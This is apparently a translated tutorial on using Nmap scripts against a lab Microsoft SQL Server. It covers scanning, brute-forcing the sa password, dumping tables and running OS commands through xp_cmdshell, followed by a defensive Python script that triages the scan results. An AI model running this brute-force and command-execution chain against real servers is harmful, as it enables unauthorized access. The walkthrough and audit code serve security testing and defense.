Nmap was launched in September 1997 and supports Linux, Windows, Solaris, BSD, Mac OS X, and AmigaOS. It is released under the GPL license and was initially used to scan for open network ports and to determine which services run on them. It is an important tool for evaluating the security of a network and is also one of the tools commonly used by hackers. The new Nmap version 5.00 significantly improves performance and adds a large number of scripts: for example, Nmap can now log on to Windows and perform a local check (PDF) to detect the notorious Conficker worm. Other main features include the new Ncat tool for data transfer, redirection and debugging, the Ndiff quick scan comparison tool, and the advanced GUI and result browser Zenmap.
Like most network security tools, Nmap is popular both with hackers and with crackers (also known as script kiddies). System administrators can use Nmap to detect unapproved servers in their environment, whereas attackers use Nmap to collect the network configuration of a target computer and plan their attack.
Nmap is often confused with the vulnerability assessment software Nessus. Nmap uses stealth techniques to avoid detection by intrusion monitoring systems, and disturbs the daily operation of the target system as little as possible.
Scanner
root@Dis9Team:~# nmap 5.5.5.3 -sV 5.5.5.3 -p1433 -vv
Starting Nmap 5.21 (http://nmap.org) at 2012-09-20 PDT
NSE: Loaded 4 scripts for scanning.
Initiating ARP Ping Scan at 23:32
Scanning 2 hosts [1 port/host]
Completed ARP Ping Scan at, 0.10s elapsed (2 total hosts)
Initiating Parallel DNS resolution of 2 hosts. at 23:32
Completed Parallel DNS resolution of 2 hosts. at 23:32, 0.26s elapsed
Initiating SYN Stealth Scan at 23:32
Scanning 2 hosts [1 port/host]
Discovered open port 1433/tcp on 5.5.5.3
Discovered open port 1433/tcp on 5.5.5.3
Completed SYN Stealth Scan at 23:32, 0.10s elapsed (2 total ports)
Initiating Service scan at 23:32
Scanning 2 services on 2 hosts
Completed Service scan at, 11.00s elapsed (2 services on 2 hosts)
NSE: Script scanning 2 hosts.
NSE: Script Scanning completed.
Nmap scan report for 5.5.5.3
Host is up (0.00015s latency).
Scanned at 23:32:32 PDT for 12s
PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2000 8.00.2039; SP4
MAC Address: 00:0C:29:03:16:F8 (VMware)
Service Info: OS: Windows
Nmap scan report for 5.5.5.3
Host is up (0.00022s latency).
Scanned at 23:32:32 PDT for 12s
PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2000 8.00.2039; SP4
MAC Address: 00:0C:29:03:16:F8 (VMware)
Service Info: OS: Windows
PASSWD
root@Dis9Team:/tmp# cd /pen/nmap/share/nmap/scripts/
root@Dis9Team:/pen/nmap/share/nmap/scripts# wget http://nmap.org/svn/scripts/ms-sql-brute.nse
For the brute-force attack, the username and password dictionaries are the files name and pass in the /tmp directory.
root@Dis9Team:/tmp# nmap -p 1433 --script ms-sql-brute --script-args userdb=name,passdb=pass 5.5.5.3
Starting Nmap 5.51 (http://nmap.org) at 2012-09-20 PDT
Nmap scan report for 5.5.5.3
Host is up (0.00021s latency).
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-brute:
|_  sa:123456 => Login Success
MAC Address: 00:0C:29:03:16:F8 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
Select
root@Dis9Team:~# nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=123456,ms-sql-query.query="SELECT @@version" 5.5.5.3
Starting Nmap 5.51 (http://nmap.org) at 2012-09-20 PDT
Nmap scan report for 5.5.5.3
Host is up (0.00021s latency).
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-query: (Use --script-args=mssql-query.query='<QUERY>' to change query.)
|   SELECT @@version
|   Version
|   ========
|   Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
|   May  3 2005 23:18:38
|   Copyright (c) 1988-2003 Microsoft Corporation
|_  Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2)
MAC Address: 00:0C:29:03:16:F8 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
root@Dis9Team:~#
Get tables
root@Dis9Team:~# nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=123456 5.5.5.3
Starting Nmap 5.51 (http://nmap.org) at 2012-09-20 PDT
Nmap scan report for 5.5.5.3
Host is up (0.00027s latency).
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-tables:
|   Pen
|     table     column    type     length
|     ==================================
|     Products  id        int      4
|     Products  prodName  varchar  50
|     Users     userId    int      4
|     Users     userName  varchar  50
|     Users     userPass  varchar  20
|
|   Restrictions
|     Output restricted to 2 tables (see mssql-tables.maxtables)
|     Output restricted to 5 databases (see mssql-tables.maxdb)
|_    No filter (see mssql-tables.keywords)
MAC Address: 00:0C:29:03:16:F8 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
root@Dis9Team:~#
xp_cmdshell
root@Dis9Team:~# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=123456,ms-sql-xp-cmdshell.cmd="ipconfig" 5.5.5.3
Starting Nmap 5.51 (http://nmap.org) at 2012-09-20 PDT
Nmap scan report for 5.5.5.3
Host is up (0.00027s latency).
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-xp-cmdshell: (Use --script-args=mssql-xp-cmdshell.cmd='<CMD>' to change command.)
|   ipconfig /all
|   Output
|   ======
|
|   Windows IP Configuration
|
|   Host Name . . . . . . . . . . . . : fuzzexp-f60914c
|   Primary Dns Suffix  . . . . . . . :
|   Node Type . . . . . . . . . . . . : Hybrid
|   IP Routing Enabled. . . . . . . . : No
|   WINS Proxy Enabled. . . . . . . . : No
|   DNS Suffix Search List. . . . . . : localdomain
|
|   Ethernet adapter 0\xDE\xA5:
|
|   Connection-specific DNS Suffix  . : localdomain
|   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
|   Physical Address. . . . . . . . . : 00-0C-29-03-16-F8
|   DHCP Enabled. . . . . . . . . . . :
|   Autoconfiguration Enabled . . . . : Yes
|   IP Address. . . . . . . . . . . . : 5.5.5.3
|   Subnet Mask . . . . . . . . . . . : 255.255.255.0
|   Default Gateway . . . . . . . . . : 5.5.5.2
|   DHCP Server . . . . . . . . . . . : 5.5.5.100
|   DNS Servers . . . . . . . . . . . : 5.5.5.2
|   Primary WINS Server . . . . . . . : 5.5.5.2
|   Lease Obtained. . . . . . . . . . : 2012t9\x0821\xE5 14:45:11
|   Lease Expires . . . . . . . . . . : 2012t9\x0821\xE5 15:15:11
|_
MAC Address: 00:0C:29:03:16:F8 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds
root@Dis9Team:~#
Link: www.2cto.com
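The sessions above chain a weak sa password into OS command execution through xp_cmdshell. As an added example (not from the original post or from the Nmap project), the script below triages the XML output (-oX) of the same ms-sql-brute and ms-sql-xp-cmdshell scripts run across a fleet, so an administrator can find the servers that need the password changed and xp_cmdshell disabled. The sample XML is constructed to mirror the page's results; the function names are the example's own.

```python
"""Triage Nmap -oX output from the ms-sql-* NSE scripts used above.

Run the audit scan with e.g.
  nmap -p 1433 --script ms-sql-brute --script-args userdb=name,passdb=pass -oX scan.xml <hosts>
then call triage(open("scan.xml").read()).
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample (not a real capture): one host, two script results.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/>
    <address addr="5.5.5.3" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="1433">
      <state state="open"/><service name="ms-sql-s"/>
      <script id="ms-sql-brute" output="&#10;  sa:123456 =&gt; Login Success"/>
      <script id="ms-sql-xp-cmdshell" output="&#10;  Output&#10;  ======&#10;  Windows IP Configuration"/>
    </port></ports>
  </host>
</nmaprun>"""

# ms-sql-brute reports each working credential as "user:password => Login Success".
LOGIN_OK = re.compile(r"^\s*(\S+?):(\S*) => Login Success", re.M)


def triage(xml_text):
    """Return (host, port, severity, detail) findings; passwords are never echoed."""
    findings = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        ip = addr.get("addr") if addr is not None else "?"
        for port in host.iter("port"):
            portid = int(port.get("portid"))
            for script in port.findall("script"):
                sid, out = script.get("id"), script.get("output", "")
                if sid == "ms-sql-brute":
                    for user, pw in LOGIN_OK.findall(out):
                        findings.append((ip, portid, "high",
                                         f"weak SQL login {user} (password length {len(pw)})"))
                # Heuristic: the script prints an "Output" header only when the command ran.
                elif sid == "ms-sql-xp-cmdshell" and "Output" in out:
                    findings.append((ip, portid, "critical",
                                     "xp_cmdshell ran an OS command for this login; disable it with sp_configure"))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_XML):
        print(f)
```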